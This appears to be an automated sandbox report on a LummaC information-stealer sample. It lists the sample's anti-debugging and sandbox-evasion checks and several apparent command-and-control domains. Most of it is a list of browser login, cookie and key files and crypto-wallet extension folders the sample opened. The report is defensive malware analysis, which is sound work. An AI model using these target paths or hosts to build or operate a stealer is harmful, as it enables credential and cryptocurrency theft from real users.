Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: IERiUft8Wi.exe, 00000000.00000002.1498883192.0000000000A17000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: NTICE
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: SICE
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: hummskitnj.buzz
Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: appliacnesot.buzz
Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: screwamusresz.buzz
Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: inherineau.buzz
Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: scentniej.buzz
Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: rebuildeso.buzz
Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: prisonyfork.buzz
Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: mindhandru.buzz

Source: IERiUft8Wi.exe, 00000000.00000002.1498883192.0000000000A17000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: IERiUft8Wi.exe, 00000000.00000003.1450284221.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450409712.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499314192.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: IERiUft8Wi.exe PID: 788, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: IERiUft8Wi.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: IERiUft8Wi.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: IERiUft8Wi.exe, 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: IERiUft8Wi.exe, 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
